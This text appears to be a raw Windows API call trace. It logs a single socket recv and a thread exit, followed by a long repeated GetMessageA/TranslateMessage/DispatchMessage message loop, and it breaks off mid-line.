USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
KERNEL32!ExitThread (0x4FFD0524)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
USER32!TranslateMessage (